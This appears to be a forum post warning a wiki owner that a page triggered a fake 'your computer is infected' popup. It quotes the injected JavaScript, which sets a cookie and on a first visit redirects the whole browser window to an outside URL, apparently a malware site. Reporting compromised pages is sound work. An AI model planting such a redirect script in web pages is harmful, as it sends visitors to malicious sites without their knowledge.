FYI, when I clicked on the first link, it popped up a "your computer is infected" dialog which I alt-f4'd away, and then it tried running something in the browser window so I alt-f4'd that. Hopefully someone hasn't figured out a way to own people browsing with Linux and google-chrome. You might want to make sure nothing funny is going on with your wiki.
which contains:
1 function setCookie(c_name,value,expiredays){
2 var exdate=new Date();
3 exdate.setDate(exdate.getDate()+expiredays);
4 document.cookie=c_name+ "=" +escape(value)+
5 ((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
6 }
7
8
9 function getCookie(c_name){
10 if (document.cookie.length>0)
11 {
12 c_start=document.cookie.indexOf(c_name + "=");
13 if (c_start!=-1)
14 {
15 c_start=c_start + c_name.length+1;
16 c_end=document.cookie.indexOf(";",c_start);
17 if (c_end==-1) c_end=document.cookie.length;
18 return unescape(document.cookie.substring(c_start,c_end));
19 }
20 }
21 return "";
22 }
23
24
25 var name=getCookie("pma_visited_theme1");
26 if (name==""){
27 setCookie("pma_visited_theme1","1",20);
28 var url="
http://www4.suitcase52td.net/?p=p52dcWpkbmmHnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D";
29 window.top.location.replace(url);
30 }else{
31
32
33 }
34
Not sure of the purpose of the above, but it doesn't seem like a good thing for a wiki to do.